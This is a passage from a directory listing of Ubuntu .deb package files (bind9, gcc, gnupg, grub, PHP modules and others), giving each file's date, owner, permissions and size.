July 23 2024 10:25:18
root
0644
bind9-dnsutils_1%3a9.18.39-0ubuntu0.24.04.2_amd64.deb
152.34 KB
October 23 2025 3:20:15
root
0644
bind9-host_1%3a9.18.28-0ubuntu0.22.04.1_amd64.deb
51.322 KB
July 23 2024 10:25:18
root
0644
bind9-host_1%3a9.18.39-0ubuntu0.24.04.2_amd64.deb
49.305 KB
October 23 2025 3:20:15
root
0644
bind9-libs_1%3a9.18.28-0ubuntu0.22.04.1_amd64.deb
1.2 MB
July 23 2024 10:25:18
root
0644
bind9-libs_1%3a9.18.39-0ubuntu0.24.04.2_amd64.deb
1.2 MB
October 23 2025 3:20:15
root
0644
binutils-common_2.42-4ubuntu2.8_amd64.deb
234.496 KB
December 11 2025 12:32:06
root
0644
binutils-x86-64-linux-gnu_2.42-4ubuntu2.8_amd64.deb
2.35 MB
December 11 2025 12:32:06
root
0644
binutils_2.42-4ubuntu2.8_amd64.deb
17.656 KB
December 11 2025 12:32:11
root
0644
bpfcc-tools_0.29.1+ds-1ubuntu7_all.deb
671.15 KB
April 19 2024 12:44:17
root
0644
bpftrace_0.20.2-1ubuntu4.3_amd64.deb
987.506 KB
February 05 2025 3:10:51
root
0644
bsdextrautils_2.37.2-4ubuntu3.4_amd64.deb
69.744 KB
April 10 2024 8:25:02
root
0644
bsdextrautils_2.39.3-9ubuntu6.3_amd64.deb
71.941 KB
June 26 2025 6:40:16
root
0644
bsdmainutils_12.1.8_all.deb
3.102 KB
May 12 2023 12:39:19
root
0644
bsdutils_1%3a2.37.2-4ubuntu3.4_amd64.deb
79.02 KB
April 10 2024 8:25:03
root
0644
bsdutils_1%3a2.39.3-9ubuntu6.3_amd64.deb
93.641 KB
June 26 2025 6:40:16
root
0644
build-essential_12.10ubuntu1_amd64.deb
4.813 KB
July 01 2023 10:19:49
root
0644
busybox-initramfs_1%3a1.30.1-7ubuntu3.1_amd64.deb
172.752 KB
August 15 2024 3:10:52
root
0644
busybox-initramfs_1%3a1.36.1-6ubuntu3.1_amd64.deb
184.086 KB
August 15 2024 3:10:57
root
0644
busybox-static_1%3a1.30.1-7ubuntu3.1_amd64.deb
995.318 KB
August 15 2024 3:10:53
root
0644
busybox-static_1%3a1.36.1-6ubuntu3.1_amd64.deb
985.229 KB
August 15 2024 3:10:57
root
0644
bzip2_1.0.8-5.1build0.1_amd64.deb
33.725 KB
August 09 2024 5:37:33
root
0644
ca-certificates_20230311ubuntu0.22.04.1_all.deb
151.842 KB
May 24 2023 10:23:49
root
0644
ca-certificates_20240203_all.deb
155.643 KB
February 07 2024 8:37:23
root
0644
certbot_1.21.0-1build1_all.deb
20.836 KB
February 17 2022 2:00:17
root
0644
command-not-found_23.04.0_all.deb
5.004 KB
January 20 2023 10:09:52
root
0644
console-setup-linux_1.226ubuntu1_all.deb
1.79 MB
March 13 2024 9:09:13
root
0644
console-setup_1.226ubuntu1_all.deb
107.279 KB
March 13 2024 9:09:13
root
0644
coreutils_8.32-4.1ubuntu1.2_amd64.deb
1.37 MB
March 19 2024 3:06:18
root
0644
coreutils_9.4-3ubuntu6.1_amd64.deb
1.35 MB
August 27 2025 11:02:10
root
0644
cpio_2.13+dfsg-7ubuntu0.1_amd64.deb
82.547 KB
April 29 2024 6:44:56
root
0644
cpio_2.15+dfsg-1ubuntu2_amd64.deb
80.73 KB
April 09 2024 12:10:58
root
0644
cpp-11_11.4.0-1ubuntu1~22.04.2_amd64.deb
9.54 MB
August 19 2025 9:01:05
root
0644
cpp-11_11.5.0-1ubuntu1~24.04_amd64.deb
9.54 MB
October 10 2024 12:53:19
root
0644
cpp-13-x86-64-linux-gnu_13.3.0-6ubuntu2~24.04_amd64.deb
10.22 MB
September 28 2024 12:37:51
root
0644
cpp-13_13.3.0-6ubuntu2~24.04_amd64.deb
1.014 KB
September 28 2024 12:38:06
root
0644
cpp-x86-64-linux-gnu_4%3a13.2.0-7ubuntu1_amd64.deb
5.201 KB
January 31 2024 10:07:08
root
0644
cpp_4%3a13.2.0-7ubuntu1_amd64.deb
21.916 KB
January 31 2024 10:07:08
root
0644
cron-daemon-common_3.0pl1-184ubuntu2_all.deb
13.26 KB
March 31 2024 8:36:58
root
0644
cron_3.0pl1-184ubuntu2_amd64.deb
83.35 KB
March 31 2024 8:36:58
root
0644
curl_7.81.0-1ubuntu1.17_amd64.deb
189.541 KB
August 05 2024 7:51:39
root
0644
curl_8.5.0-2ubuntu10.6_amd64.deb
221.188 KB
December 16 2024 9:16:49
root
0644
dash_0.5.12-6ubuntu5_amd64.deb
87.73 KB
April 01 2024 2:38:08
root
0644
dbus-bin_1.14.10-4ubuntu4.1_amd64.deb
38.389 KB
August 09 2024 5:37:30
root
0644
dbus-daemon_1.14.10-4ubuntu4.1_amd64.deb
115.379 KB
August 09 2024 5:37:30
root
0644
dbus-session-bus-common_1.14.10-4ubuntu4.1_all.deb
78.662 KB
August 09 2024 5:37:29
root
0644
dbus-system-bus-common_1.14.10-4ubuntu4.1_all.deb
79.734 KB
August 09 2024 5:37:29
root
0644
dbus-user-session_1.14.10-4ubuntu4.1_amd64.deb
9.734 KB
August 09 2024 5:37:29
root
0644
dbus_1.12.20-2ubuntu4.1_amd64.deb
154.393 KB
October 27 2022 9:08:35
root
0644
dbus_1.14.10-4ubuntu4.1_amd64.deb
23.73 KB
August 09 2024 5:37:30
root
0644
debconf-i18n_1.5.86ubuntu1_all.deb
199.936 KB
April 12 2024 10:47:36
root
0644
debconf_1.5.86ubuntu1_all.deb
121.188 KB
April 12 2024 10:47:36
root
0644
debhelper_13.14.1ubuntu5_all.deb
848.916 KB
March 01 2024 1:58:31
root
0644
debianutils_5.17build1_amd64.deb
87.783 KB
April 01 2024 2:38:13
root
0644
debugedit_1%3a5.0-5build2_amd64.deb
45.027 KB
April 04 2024 11:48:40
root
0644
dh-strip-nondeterminism_1.13.1-1_all.deb
5.236 KB
January 16 2023 1:24:17
root
0644
dhcpcd-base_1%3a10.0.6-1ubuntu3.1_amd64.deb
209.994 KB
May 10 2024 5:54:35
root
0644
dictionaries-common_1.29.7_all.deb
183.244 KB
October 27 2023 1:36:46
root
0644
diffutils_1%3a3.10-1build1_amd64.deb
172.701 KB
April 09 2024 12:10:58
root
0644
dirmngr_2.2.27-3ubuntu2.1_amd64.deb
285.967 KB
July 05 2022 9:19:11
root
0644
dirmngr_2.2.27-3ubuntu2.4_amd64.deb
285.941 KB
July 07 2025 11:25:57
root
0644
dirmngr_2.4.4-2ubuntu17.3_amd64.deb
315.65 KB
July 07 2025 11:26:11
root
0644
distro-info-data_0.52ubuntu0.7_all.deb
5.201 KB
May 01 2024 6:23:10
root
0644
distro-info-data_0.60ubuntu0.5_all.deb
6.771 KB
October 11 2025 3:12:31
root
0644
distro-info_1.1ubuntu0.2_amd64.deb
18.223 KB
December 09 2023 1:27:14
root
0644
distro-info_1.7build1_amd64.deb
19.408 KB
April 09 2024 12:10:58
root
0644
dmidecode_3.3-3ubuntu0.1_amd64.deb
67.018 KB
August 31 2022 1:33:52
root
0644
dmidecode_3.5-3ubuntu0.1_amd64.deb
71.293 KB
November 15 2024 11:06:24
root
0644
dmsetup_2%3a1.02.185-3ubuntu3.2_amd64.deb
77.326 KB
December 16 2024 11:35:22
root
0644
dosfstools_4.2-1.1build1_amd64.deb
84.234 KB
April 01 2024 2:38:13
root
0644
dpkg-dev_1.22.6ubuntu6.5_all.deb
1.02 MB
September 24 2025 9:48:55
root
0644
dpkg_1.21.1ubuntu2.3_amd64.deb
1.18 MB
February 29 2024 3:12:28
root
0644
dpkg_1.22.6ubuntu6.5_amd64.deb
1.22 MB
September 24 2025 9:48:55
root
0644
dracut-install_060+5-1ubuntu3.3_amd64.deb
31.523 KB
February 14 2025 10:11:26
root
0644
dwz_0.15-1build6_amd64.deb
111.977 KB
April 01 2024 2:51:59
root
0644
e2fsprogs_1.46.5-2ubuntu1.2_amd64.deb
576.646 KB
July 31 2024 5:14:20
root
0644
e2fsprogs_1.47.0-2.4~exp1ubuntu4.1_amd64.deb
586.656 KB
July 31 2024 5:15:46
root
0644
ed_1.20.1-1_amd64.deb
54.748 KB
February 18 2024 1:24:03
root
0644
eject_2.37.2-4ubuntu3.4_amd64.deb
26.139 KB
April 10 2024 8:25:03
root
0644
eject_2.39.3-9ubuntu6.3_amd64.deb
25.645 KB
June 26 2025 6:40:16
root
0644
emacsen-common_3.0.5_all.deb
11.832 KB
December 27 2022 7:39:23
root
0644
ethtool_1%3a6.7-1build1_amd64.deb
223.154 KB
April 09 2024 1:03:42
root
0644
fakeroot_1.33-1_amd64.deb
65.641 KB
January 22 2024 7:41:33
root
0644
fdisk_2.37.2-4ubuntu3.4_amd64.deb
119.406 KB
April 10 2024 8:25:03
root
0644
fdisk_2.39.3-9ubuntu6.3_amd64.deb
118.693 KB
June 26 2025 6:40:16
root
0644
file_1%3a5.41-3ubuntu0.1_amd64.deb
21.02 KB
September 13 2023 12:23:29
root
0644
file_1%3a5.45-3build1_amd64.deb
21.525 KB
March 31 2024 5:07:43
root
0644
findutils_4.9.0-5build1_amd64.deb
291.305 KB
April 09 2024 1:03:38
root
0644
firmware-sof-signed_2.0-1ubuntu4.7_all.deb
1.21 MB
March 22 2024 6:14:14
root
0644
firmware-sof-signed_2023.12.1-1ubuntu1.10_all.deb
7.04 MB
September 26 2025 9:46:20
root
0644
fontconfig-config_2.15.0-1.1ubuntu2_amd64.deb
36.424 KB
March 31 2024 9:32:26
root
0644
fonts-dejavu-core_2.37-8_all.deb
815.598 KB
August 11 2023 7:44:31
root
0644
fonts-dejavu-mono_2.37-8_all.deb
490.461 KB
August 11 2023 7:44:31
root
0644
fonts-noto-mono_20201225-2_all.deb
424.58 KB
August 19 2023 7:19:10
root
0644
fonts-urw-base35_20200910-8_all.deb
10.46 MB
March 01 2024 1:58:37
root
0644
ftp_20230507-2build3_all.deb
4.617 KB
April 08 2024 11:20:45
root
0644
fuse3_3.14.0-5build1_amd64.deb
24.566 KB
April 09 2024 1:03:38
root
0644
g++-11_11.4.0-1ubuntu1~22.04.2_amd64.deb
10.89 MB
August 19 2025 9:01:05
root
0644
g++-11_11.5.0-1ubuntu1~24.04_amd64.deb
10.9 MB
October 10 2024 12:53:18
root
0644
g++-13-x86-64-linux-gnu_13.3.0-6ubuntu2~24.04_amd64.deb
11.6 MB
September 28 2024 12:37:50
root
0644
g++-13_13.3.0-6ubuntu2~24.04_amd64.deb
15.674 KB
September 28 2024 12:38:06
root
0644
g++-x86-64-linux-gnu_4%3a13.2.0-7ubuntu1_amd64.deb
0.941 KB
January 31 2024 10:07:07
root
0644
g++_4%3a13.2.0-7ubuntu1_amd64.deb
1.074 KB
January 31 2024 10:07:08
root
0644
gcc-10-base_10.5.0-1ubuntu1~22.04.2_amd64.deb
21.016 KB
August 19 2025 9:00:39
root
0644
gcc-10-base_10.5.0-1ubuntu1~22.04_amd64.deb
20.951 KB
July 13 2023 9:59:21
root
0644
gcc-10-base_10.5.0-4ubuntu2_amd64.deb
38.986 KB
March 31 2024 5:08:12
root
0644
gcc-11-base_11.4.0-1ubuntu1~22.04.2_amd64.deb
20.275 KB
August 19 2025 9:01:04
root
0644
gcc-11-base_11.5.0-1ubuntu1~24.04_amd64.deb
44.379 KB
October 10 2024 12:53:17
root
0644
gcc-11_11.4.0-1ubuntu1~22.04.2_amd64.deb
19.21 MB
August 19 2025 9:01:03
root
0644
gcc-11_11.5.0-1ubuntu1~24.04_amd64.deb
19.2 MB
October 10 2024 12:53:17
root
0644
gcc-12-base_12.3.0-1ubuntu1~22.04.2_amd64.deb
20.088 KB
August 19 2025 9:01:26
root
0644
gcc-12-base_12.3.0-1ubuntu1~22.04_amd64.deb
19.598 KB
June 29 2023 10:09:27
root
0644
gcc-12-base_12.4.0-2ubuntu1~24.04_amd64.deb
45.58 KB
October 10 2024 12:56:23
root
0644
gcc-13-base_13.3.0-6ubuntu2~24.04_amd64.deb
50.258 KB
September 28 2024 12:38:06
root
0644
gcc-13-x86-64-linux-gnu_13.3.0-6ubuntu2~24.04_amd64.deb
20.11 MB
September 28 2024 12:37:49
root
0644
gcc-13_13.3.0-6ubuntu2~24.04_amd64.deb
482.684 KB
September 28 2024 12:38:06
root
0644
gcc-14-base_14.2.0-4ubuntu2~24.04_amd64.deb
49.635 KB
September 27 2024 6:19:38
root
0644
gcc-x86-64-linux-gnu_4%3a13.2.0-7ubuntu1_amd64.deb
1.184 KB
January 31 2024 10:07:06
root
0644
gcc_4%3a13.2.0-7ubuntu1_amd64.deb
4.9 KB
January 31 2024 10:07:07
root
0644
gettext-base_0.21-14ubuntu2_amd64.deb
37.5 KB
April 09 2024 1:03:22
root
0644
gettext_0.21-14ubuntu2_amd64.deb
844.08 KB
April 09 2024 1:03:22
root
0644
ghostscript_10.02.1~dfsg1-0ubuntu7.8_amd64.deb
42.357 KB
September 29 2025 8:37:08
root
0644
ghostscript_9.55.0~dfsg1-0ubuntu5.12_amd64.deb
48.285 KB
July 08 2025 10:38:10
root
0644
gir1.2-girepository-2.0_1.80.1-1_amd64.deb
23.955 KB
April 02 2024 7:02:30
root
0644
gir1.2-glib-2.0_2.80.0-6ubuntu3.4_amd64.deb
179.139 KB
May 26 2025 4:51:11
root
0644
gir1.2-packagekitglib-1.0_1.2.8-2ubuntu1.4_amd64.deb
24.998 KB
October 17 2025 11:23:48
root
0644
git-man_1%3a2.34.1-1ubuntu1.15_all.deb
932.609 KB
July 11 2025 3:50:45
root
0644
git-man_1%3a2.43.0-1ubuntu7.3_all.deb
1.05 MB
July 09 2025 1:21:25
root
0644
git_1%3a2.34.1-1ubuntu1.15_amd64.deb
3.02 MB
July 11 2025 3:50:46
root
0644
git_1%3a2.43.0-1ubuntu7.3_amd64.deb
3.51 MB
July 09 2025 1:21:28
root
0644
gnupg-l10n_2.2.27-3ubuntu2.1_all.deb
53.109 KB
July 05 2022 9:19:11
root
0644
gnupg-l10n_2.2.27-3ubuntu2.4_all.deb
53.463 KB
July 07 2025 11:25:55
root
0644
gnupg-l10n_2.4.4-2ubuntu17.3_all.deb
64.822 KB
July 07 2025 11:26:09
root
0644
gnupg-utils_2.2.27-3ubuntu2.1_amd64.deb
300.783 KB
July 05 2022 9:19:11
root
0644
gnupg-utils_2.2.27-3ubuntu2.4_amd64.deb
301.484 KB
July 07 2025 11:25:56
root
0644
gnupg-utils_2.4.4-2ubuntu17.3_amd64.deb
106.443 KB
July 07 2025 11:26:10
root
0644
gnupg_2.2.27-3ubuntu2.1_all.deb
307.553 KB
July 05 2022 9:19:11
root
0644
gnupg_2.2.27-3ubuntu2.4_all.deb
307.543 KB
July 07 2025 11:25:56
root
0644
gnupg_2.4.4-2ubuntu17.3_all.deb
350.48 KB
July 07 2025 11:26:09
root
0644
gpg-agent_2.2.27-3ubuntu2.1_amd64.deb
203.756 KB
July 05 2022 9:19:10
root
0644
gpg-agent_2.2.27-3ubuntu2.4_amd64.deb
203.746 KB
July 07 2025 11:25:56
root
0644
gpg-agent_2.4.4-2ubuntu17.3_amd64.deb
221.742 KB
July 07 2025 11:26:10
root
0644
gpg-wks-client_2.2.27-3ubuntu2.1_amd64.deb
61.197 KB
July 05 2022 9:19:11
root
0644
gpg-wks-client_2.2.27-3ubuntu2.4_amd64.deb
61.201 KB
July 07 2025 11:25:56
root
0644
gpg-wks-client_2.4.4-2ubuntu17.3_amd64.deb
69.199 KB
July 07 2025 11:26:10
root
0644
gpg-wks-server_2.2.27-3ubuntu2.1_amd64.deb
56.178 KB
July 05 2022 9:19:11
root
0644
gpg-wks-server_2.2.27-3ubuntu2.4_amd64.deb
56.199 KB
July 07 2025 11:25:56
root
0644
gpg_2.2.27-3ubuntu2.1_amd64.deb
506.438 KB
July 05 2022 9:19:10
root
0644
gpg_2.2.27-3ubuntu2.4_amd64.deb
506.057 KB
July 07 2025 11:25:56
root
0644
gpg_2.4.4-2ubuntu17.3_amd64.deb
551.879 KB
July 07 2025 11:26:11
root
0644
gpgconf_2.2.27-3ubuntu2.1_amd64.deb
91.949 KB
July 05 2022 9:19:10
root
0644
gpgconf_2.2.27-3ubuntu2.4_amd64.deb
92.277 KB
July 07 2025 11:25:56
root
0644
gpgconf_2.4.4-2ubuntu17.3_amd64.deb
101.27 KB
July 07 2025 11:26:10
root
0644
gpgsm_2.2.27-3ubuntu2.1_amd64.deb
192.844 KB
July 05 2022 9:19:11
root
0644
gpgsm_2.2.27-3ubuntu2.4_amd64.deb
192.852 KB
July 07 2025 11:25:56
root
0644
gpgsm_2.4.4-2ubuntu17.3_amd64.deb
226.189 KB
July 07 2025 11:26:11
root
0644
gpgv_2.2.27-3ubuntu2.1_amd64.deb
133.592 KB
July 05 2022 9:19:11
root
0644
gpgv_2.2.27-3ubuntu2.4_amd64.deb
134.139 KB
July 07 2025 11:25:56
root
0644
gpgv_2.4.4-2ubuntu17.3_amd64.deb
154.266 KB
July 07 2025 11:26:11
root
0644
grep_3.11-4build1_amd64.deb
158.242 KB
April 09 2024 1:03:33
root
0644
groff-base_1.23.0-3build2_amd64.deb
995.734 KB
April 01 2024 2:38:27
root
0644
grub-common_2.06-2ubuntu7.2_amd64.deb
2.11 MB
February 03 2023 1:49:25
root
0644
grub-common_2.12-1ubuntu7.3_amd64.deb
2.02 MB
April 02 2025 4:12:57
root
0644
grub-gfxpayload-lists_0.7build2_amd64.deb
3.436 KB
April 09 2024 1:03:38
root
0644
grub-pc-bin_2.06-2ubuntu7.2_amd64.deb
1.03 MB
February 03 2023 1:49:26
root
0644
grub-pc-bin_2.12-1ubuntu7.3_amd64.deb
1.05 MB
April 02 2025 4:12:55
root
0644
grub-pc_2.06-2ubuntu7.2_amd64.deb
128.73 KB
February 03 2023 1:49:25
root
0644
grub-pc_2.12-1ubuntu7.3_amd64.deb
133.891 KB
April 02 2025 4:12:56
root
0644
grub2-common_2.06-2ubuntu7.2_amd64.deb
636.811 KB
February 03 2023 1:49:25
root
0644
grub2-common_2.12-1ubuntu7.3_amd64.deb
653.969 KB
April 02 2025 4:12:54
root
0644
gsfonts_2%3a20200910-8_all.deb
16.652 KB
March 01 2024 1:58:37
root
0644
gzip_1.10-4ubuntu4.1_amd64.deb
93.797 KB
September 09 2022 8:39:18
root
0644
gzip_1.12-1ubuntu3.1_amd64.deb
96.662 KB
March 01 2025 1:25:52
root
0644
hdparm_9.65+ds-1build1_amd64.deb
95.857 KB
April 09 2024 1:03:33
root
0644
hostname_3.23+nmu2ubuntu2_amd64.deb
10.799 KB
April 09 2024 1:03:33
root
0644
hwdata_0.379-1_all.deb
28.428 KB
February 15 2024 8:30:59
root
0644
ieee-data_20220827.1_all.deb
2.01 MB
August 29 2022 12:48:50
root
0644
imagemagick-6-common_8%3a6.9.12.98+dfsg1-5.2build2_all.deb
67.867 KB
April 01 2024 5:14:10
root
0644
inetutils-telnet_2%3a2.5-3ubuntu4_amd64.deb
97.662 KB
March 31 2024 8:36:55
root
0644
info_7.1-3build2_amd64.deb
138.986 KB
March 31 2024 8:37:04
root
0644
init-system-helpers_1.66ubuntu1_all.deb
38.479 KB
December 06 2023 4:27:57
root
0644
init_1.66ubuntu1_amd64.deb
6.041 KB
December 06 2023 4:27:57
root
0644
initramfs-tools-bin_0.140ubuntu13.4_amd64.deb
9.082 KB
July 28 2023 6:12:20
root
0644
initramfs-tools-bin_0.140ubuntu13.5_amd64.deb
9.111 KB
April 03 2024 3:51:35
root
0644
initramfs-tools-bin_0.142ubuntu25.5_amd64.deb
21.004 KB
February 14 2025 10:11:24
root
0644
initramfs-tools-core_0.140ubuntu13.4_all.deb
46.682 KB
July 28 2023 6:12:20
root
0644
initramfs-tools-core_0.140ubuntu13.5_all.deb
46.693 KB
April 03 2024 3:51:35
root
0644
initramfs-tools-core_0.142ubuntu25.5_all.deb
49.326 KB
February 14 2025 10:11:24
root
0644
initramfs-tools_0.140ubuntu13.4_all.deb
8.83 KB
July 28 2023 6:12:20
root
0644
initramfs-tools_0.140ubuntu13.5_all.deb
8.848 KB
April 03 2024 3:51:35
root
0644
initramfs-tools_0.142ubuntu25.5_all.deb
8.848 KB
February 14 2025 10:11:24
root
0644
install-info_7.1-3build2_amd64.deb
60.963 KB
March 31 2024 8:37:04
root
0644
intel-microcode_3.20240813.0ubuntu0.22.04.2_amd64.deb
6.61 MB
August 19 2024 2:25:32
root
0644
intel-microcode_3.20250512.0ubuntu0.22.04.1_amd64.deb
10.53 MB
May 27 2025 7:00:37
root
0644
intel-microcode_3.20250812.0ubuntu0.24.04.1_amd64.deb
10.95 MB
November 11 2025 5:29:59
root
0644
intltool-debian_0.35.0+20060710.6_all.deb
22.701 KB
November 06 2022 11:22:50
root
0644
iproute2_6.1.0-1ubuntu6.2_amd64.deb
1.07 MB
July 22 2025 6:48:09
root
0644
iptables_1.8.10-3ubuntu2_amd64.deb
372.391 KB
April 09 2024 1:03:21
root
0644
iptables_1.8.7-1ubuntu5.2_amd64.deb
444.691 KB
January 20 2024 10:05:03
root
0644
iputils-ping_3%3a20211215-1ubuntu0.1_amd64.deb
42.012 KB
July 24 2025 11:31:19
root
0644
iputils-ping_3%3a20240117-1ubuntu0.1_amd64.deb
43.539 KB
July 24 2025 11:31:23
root
0644
iputils-tracepath_3%3a20211215-1ubuntu0.1_amd64.deb
13.84 KB
July 24 2025 11:31:19
root
0644
iputils-tracepath_3%3a20240117-1ubuntu0.1_amd64.deb
13.066 KB
July 24 2025 11:31:23
root
0644
irqbalance_1.8.0-1ubuntu0.2_amd64.deb
46.076 KB
November 17 2023 11:26:01
root
0644
irqbalance_1.9.3-2ubuntu5_amd64.deb
46.41 KB
April 01 2024 2:51:58
root
0644
isc-dhcp-client_4.4.1-2.3ubuntu2.4_amd64.deb
229.129 KB
February 09 2023 9:59:01
root
0644
isc-dhcp-client_4.4.3-P1-4ubuntu2_amd64.deb
321.377 KB
April 22 2024 7:47:59
root
0644
isc-dhcp-common_4.4.1-2.3ubuntu2.4_amd64.deb
43.912 KB
February 09 2023 9:59:01
root
0644
isc-dhcp-common_4.4.3-P1-4ubuntu2_amd64.deb
44.727 KB
April 22 2024 7:47:59
root
0644
iso-codes_4.16.0-1_all.deb
3.33 MB
January 15 2024 1:25:07
root
0644
iucode-tool_2.3.1-3build1_amd64.deb
42.822 KB
April 09 2024 1:03:23
root
0644
iw_6.7-1build1_amd64.deb
111.281 KB
April 01 2024 2:38:31
root
0644
kbd_2.3.0-3ubuntu4.22.04_amd64.deb
239.564 KB
January 16 2023 11:48:59
root
0644
kbd_2.6.4-2ubuntu2_amd64.deb
235.566 KB
April 01 2024 2:38:30
root
0644
keyboard-configuration_1.226ubuntu1_all.deb
206.83 KB
March 13 2024 9:09:13
root
0644
keyboxd_2.4.4-2ubuntu17.3_amd64.deb
76.424 KB
July 07 2025 11:26:10
root
0644
klibc-utils_2.0.10-4ubuntu0.1_amd64.deb
97.57 KB
April 16 2024 7:50:17
root
0644
klibc-utils_2.0.13-4ubuntu0.1_amd64.deb
97.854 KB
May 23 2024 5:05:04
root
0644
kmod_31+20240202-2ubuntu7.1_amd64.deb
99.066 KB
October 15 2024 6:00:59
root
0644
krb5-locales_1.19.2-2ubuntu0.4_all.deb
11.535 KB
August 08 2024 12:05:45
root
0644
krb5-locales_1.19.2-2ubuntu0.7_all.deb
11.949 KB
May 28 2025 10:21:16
root
0644
krb5-locales_1.20.1-6ubuntu2.6_all.deb
14.422 KB
May 28 2025 10:21:42
root
0644
language-pack-en-base_1%3a22.04+20240212_all.deb
429.055 KB
February 13 2024 1:19:05
root
0644
language-pack-en-base_1%3a24.04+20250724_all.deb
436.547 KB
July 29 2025 2:14:58
root
0644
language-pack-en_1%3a22.04+20240212_all.deb
1.855 KB
February 13 2024 1:19:05
root
0644
language-pack-en_1%3a24.04+20250724_all.deb
1.848 KB
July 29 2025 2:14:58
root
0644
language-pack-gnome-en-base_1%3a22.04+20240212_all.deb
470.082 KB
February 13 2024 1:18:59
root
0644
language-pack-gnome-en-base_1%3a24.04+20250724_all.deb
412.348 KB
July 29 2025 2:14:58
root
0644
language-pack-gnome-en_1%3a22.04+20240212_all.deb
1.879 KB
February 13 2024 1:19:03
root
0644
language-pack-gnome-en_1%3a24.04+20250724_all.deb
1.871 KB
July 29 2025 2:14:59
root
0644
language-selector-common_0.219.1_all.deb
248.641 KB
January 06 2023 2:24:26
root
0644
language-selector-common_0.225_all.deb
252.102 KB
April 19 2024 10:59:42
root
0644
less_590-1ubuntu0.22.04.3_amd64.deb
138.859 KB
April 29 2024 6:44:56
root
0644
less_590-2ubuntu2.1_amd64.deb
138.227 KB
April 29 2024 6:44:58
root
0644
libabsl20210324_0~20210324.2-2ubuntu0.2_amd64.deb
376.918 KB
May 12 2025 6:26:25
root
0644
libabsl20220623t64_20220623.1-3.1ubuntu3.2_amd64.deb
413.008 KB
May 12 2025 6:26:27
root
0644
libaccountsservice0_22.07.5-2ubuntu1.5_amd64.deb
61.158 KB
March 11 2024 9:04:28
root
0644
libaccountsservice0_23.13.9-2ubuntu6_amd64.deb
62.262 KB
April 04 2024 1:29:46
root
0644
libacl1_2.3.2-1build1.1_amd64.deb
16.398 KB
October 15 2024 4:38:57
root
0644
libaio1t64_0.3.113-6build1.1_amd64.deb
7.041 KB
October 15 2024 6:00:59
root
0644
libalgorithm-diff-xs-perl_0.04-8build3_amd64.deb
10.914 KB
March 31 2024 5:07:43
root
0644
libalgorithm-merge-perl_0.08-5_all.deb
11.115 KB
November 06 2022 11:22:19
root
0644
libaom3_3.8.2-2ubuntu0.1_amd64.deb
1.85 MB
June 07 2024 2:24:46
root
0644
libapache2-mod-php7.4_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.45 MB
July 04 2025 1:46:19
root
0644
libapache2-mod-php7.4_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.44 MB
December 19 2025 8:16:54
root
0644
libapache2-mod-php8.2_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.74 MB
July 03 2025 11:30:56
root
0644
libapache2-mod-php8.2_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.73 MB
December 19 2025 9:10:23
root
0644
libapache2-mod-php8.3_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.78 MB
August 29 2025 9:56:24
root
0644
libapache2-mod-php8.3_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.77 MB
December 19 2025 9:10:17
root
0644
libapparmor1_3.0.4-2ubuntu2.3build2_amd64.deb
38.287 KB
September 04 2024 8:45:32
root
0644
libapparmor1_4.0.1really4.0.1-0ubuntu0.24.04.4_amd64.deb
49.373 KB
March 27 2025 1:36:24
root
0644
libappstream5_1.0.2-1build6_amd64.deb
232.682 KB
April 08 2024 11:20:57
root
0644
libapr1t64_1.7.2-3.1ubuntu0.1_amd64.deb
105.127 KB
September 26 2024 2:30:51
root
0644
libaprutil1-dbd-sqlite3_1.6.3-1.1ubuntu7_amd64.deb
10.982 KB
April 06 2024 9:24:05
root
0644
libaprutil1-ldap_1.6.3-1.1ubuntu7_amd64.deb
8.902 KB
April 06 2024 9:24:05
root
0644
libaprutil1t64_1.6.3-1.1ubuntu7_amd64.deb
89.756 KB
April 06 2024 9:24:05
root
0644
libapt-pkg6.0_2.4.12_amd64.deb
890.645 KB
February 15 2024 10:47:29
root
0644
libapt-pkg6.0_2.4.14_amd64.deb
890.689 KB
March 29 2025 5:52:28
root
0644
libapt-pkg6.0t64_2.8.3_amd64.deb
961.625 KB
March 29 2025 5:52:33
root
0644
libarchive-cpio-perl_0.10-3_all.deb
10.027 KB
November 20 2022 1:36:11
root
0644
libargon2-1_0~20190702+dfsg-4build1_amd64.deb
20.336 KB
April 09 2024 12:11:05
root
0644
libasan6_11.4.0-1ubuntu1~22.04.2_amd64.deb
2.18 MB
August 19 2025 9:01:06
root
0644
libasan6_11.5.0-1ubuntu1~24.04_amd64.deb
2.18 MB
October 10 2024 12:53:19
root
0644
libasan8_14.2.0-4ubuntu2~24.04_amd64.deb
2.89 MB
September 27 2024 6:19:40
root
0644
libassuan0_2.5.6-1build1_amd64.deb
36.383 KB
April 09 2024 1:03:18
root
0644
libatm1t64_1%3a2.5.1-5.1build1_amd64.deb
22.324 KB
April 03 2024 10:51:26
root
0644
libatomic1_12.3.0-1ubuntu1~22.04.2_amd64.deb
10.203 KB
August 19 2025 9:01:29
root
0644
libatomic1_14.2.0-4ubuntu2~24.04_amd64.deb
10.219 KB
September 27 2024 6:19:43
root
0644
libattr1_1%3a2.5.2-1build1.1_amd64.deb
11.088 KB
October 15 2024 5:22:04
root
0644
libaudit-common_1%3a3.1.2-2.1build1.1_all.deb
5.688 KB
October 15 2024 5:22:03
root
0644
libaudit1_1%3a3.1.2-2.1build1.1_amd64.deb
45.861 KB
October 15 2024 5:22:02
root
0644
libaugeas0_1.13.0-1_amd64.deb
195.699 KB
December 25 2021 1:29:05
root
0644
libavahi-client3_0.8-13ubuntu6_amd64.deb
26.174 KB
April 05 2024 8:13:39
root
0644
libavahi-common-data_0.8-13ubuntu6_amd64.deb
28.957 KB
April 05 2024 8:13:39
root
0644
libavahi-common3_0.8-13ubuntu6_amd64.deb
22.762 KB
April 05 2024 8:13:39
root
0644
libavif16_1.0.4-1ubuntu3_amd64.deb
89.111 KB
April 01 2024 3:32:43
root
0644
libbinutils_2.42-4ubuntu2.8_amd64.deb
562.137 KB
December 11 2025 12:32:06
root
0644
libblkid1_2.37.2-4ubuntu3.4_amd64.deb
100.822 KB
April 10 2024 8:25:03
root
0644
libblkid1_2.39.3-9ubuntu6.3_amd64.deb
120.102 KB
June 26 2025 6:40:16
root
0644
libbpf0_1%3a0.5.0-1ubuntu22.04.1_amd64.deb
